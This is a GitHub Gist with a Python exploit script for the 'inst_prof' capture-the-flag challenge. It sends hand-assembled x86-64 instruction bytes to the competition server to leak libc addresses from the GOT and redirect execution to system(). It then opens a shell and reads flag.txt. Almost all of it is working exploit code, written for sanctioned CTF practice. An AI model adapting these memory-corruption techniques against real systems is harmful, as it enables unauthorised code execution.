Created
June 19, 2017 05:34
-
-
Save autotaker/9ec3329544e2d45f02eb632b462ea44f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| import struct | |
| import binascii | |
| import random | |
| import time | |
| remote = True | |
| if remote: | |
| cmd = "nc inst-prof.ctfcompetition.com 1337" | |
| else: | |
| cmd = "./inst_prof" | |
| pr = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE) | |
| out = open('payload','wb') | |
| def send(s): | |
| pr.stdin.write(s) | |
| out.write(s) | |
| pr.stdin.flush() | |
| print("SEND:", s) | |
| def recv(n): | |
| line = pr.stdout.read(n) | |
| print("RECV:", line) | |
| return line | |
| def send_command(data): | |
| assert(len(data) == 8) | |
| send(binascii.unhexlify(data)) | |
| return struct.unpack('<Q', recv(8))[0] | |
| # 000000202050 000a00000007 R_X86_64_JUMP_SLO 0000000000000000 mprotect@GLIBC_2.2.5 + 0 | |
| # 000000202048 000900000007 R_X86_64_JUMP_SLO 0000000000000000 munmap@GLIBC_2.2.5 + 0 | |
| # 202038 | |
| offset_mprotect_got = 0x202050 | |
| offset_munmap_got = 0x202048 | |
| offset_main_got = 0x202038 | |
| offset_do_test_rtn = 0xac0 + 88 | |
| recv(26) # lets draw... | |
| offset = offset_munmap_got - offset_do_test_rtn | |
| # mov r13, rsp | |
| send_command("4989e5c3") | |
| # (inc r13) * 0x1000 | |
| send_command("49ffc590") | |
| for i in range(3): | |
| # mov r14b, offset[(8*i + 7):8*i] | |
| send_command("41b6%02xc3" % ((offset >> (8*i)) & 0xff)) | |
| # mov byte [r13+ i], r14b | |
| send_command("458875%02x" % i) | |
| for i in range(3,8): | |
| # mov byte [r13+i], al (al == 0) | |
| send_command("418845%02x" % i) | |
| # mov r14, qword [r13] | |
| send_command("4d8b7500") | |
| # mov r15, qword [rsp] | |
| send_command("4c8b3c24") | |
| # add r15, r14; ret | |
| send_command("4d01f7c3") | |
| def leak_libc(): | |
| for offset in [offset_main_got, offset_munmap_got]: | |
| offset = offset - offset_do_test_rtn | |
| # mov r13, rsp | |
| send_command("4989e5c3") | |
| # (inc r13) * 0x1000 | |
| send_command("49ffc590") | |
| for i in range(3): | |
| # mov r14b, offset[(8*i + 7):8*i] | |
| send_command("41b6%02xc3" % ((offset >> (8*i)) & 0xff)) | |
| # mov byte [r13+ i], r14b | |
| send_command("458875%02x" % i) | |
| for i in range(3,8): | |
| # mov byte [r13+i], al (al == 0) | |
| send_command("418845%02x" % i) | |
| # mov r14, qword [r13] | |
| send_command("4d8b7500") | |
| # mov r15, qword [rsp] | |
| send_command("4c8b3c24") | |
| # add r15, r14; ret | |
| send_command("4d01f7c3") | |
| # mov r15 qword [r15] | |
| send_command("4d8b3fc3") | |
| # mov qword [r13], r15 | |
| send_command("4d897d00") | |
| # mov r14, qword [r13+0x7] | |
| send_command("4d8b75f9") | |
| # xor r12, r12 | |
| t = send_command("4d31e4c3") | |
| # mov r12, r14 | |
| t1 = send_command("4d89f4c3") | |
| dt = t - t1 | |
| if dt < 0: | |
| dt = dt + (1 << 64) | |
| print( "%x" % dt) | |
| # mov r14, qword [r13+0x6] | |
| send_command("4d8b75fa") | |
| # xor r12, r12 | |
| t = send_command("4d31e4c3") | |
| # mov r12, r14 | |
| t1 = send_command("4d89f4c3") | |
| dt = t - t1 | |
| if dt < 0: | |
| dt = dt + (1 << 64) | |
| print( "%x" % dt) | |
| # mov r14, qword [r13+0x6] | |
| send_command("4d8b75fb") | |
| # xor r12, r12 | |
| t = send_command("4d31e4c3") | |
| # mov r12, r14 | |
| t1 = send_command("4d89f4c3") | |
| dt = t - t1 | |
| if dt < 0: | |
| dt = dt + (1 << 64) | |
| print( "%x" % dt) | |
| # mov r14, qword [r13+0x6] | |
| send_command("4d8b75fc") | |
| # xor r12, r12 | |
| t = send_command("4d31e4c3") | |
| # mov r12, r14 | |
| t1 = send_command("4d89f4c3") | |
| dt = t - t1 | |
| if dt < 0: | |
| dt = dt + (1 << 64) | |
| print( "%x" % dt) | |
| pr.stdin.close() | |
| print(pr.stdout.read()) | |
| out.close() | |
| exit(0) | |
| local_libc_system = 0x45390 | |
| local_libc_mprotect = 0x100b80 | |
| local_libc_munmap = 0x100b50 | |
| remote_libc_system = 0x46590 | |
| remote_libc_munmap = 0xf8110 | |
| if remote: | |
| offset = -(remote_libc_system - remote_libc_munmap) | |
| else: | |
| offset = -(local_libc_system - local_libc_munmap) | |
| # mov r13, rsp | |
| send_command("4989e5c3") | |
| # (inc r13) * 0x1000 | |
| send_command("49ffc590") | |
| for i in range(3): | |
| # mov r14b, offset[(8*i + 7):8*i] | |
| send_command("41b6%02xc3" % ((offset >> (8*i)) & 0xff)) | |
| # mov byte [r13+ i], r14b | |
| send_command("458875%02x" % i) | |
| for i in range(3,8): | |
| # mov byte [r13+i], al (al == 0) | |
| send_command("418845%02x" % i) | |
| shellcode= b'sh\0' | |
| for i in range(len(shellcode)): | |
| # mov r14b, shellcode[i] | |
| send_command("41b6%02xc3" % (shellcode[i])) | |
| # mov byte [r13+ 8 + i], r14b | |
| send_command("458875%02x" % (i+0x8)) | |
| # mov r14, qword [r13] | |
| send_command("4d8b7500") | |
| # sub qword [r15], r14 | |
| send_command("4d2937c3") | |
| # lea rbx,[r13+0x8] | |
| send_command("498d5d08") | |
| # mov rbx r13 | |
| # ";sh\0" | |
| time.sleep(1) | |
| send(b"cat flag.txt") | |
| pr.stdin.close() | |
| print(pr.stdout.read()) | |
| out.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment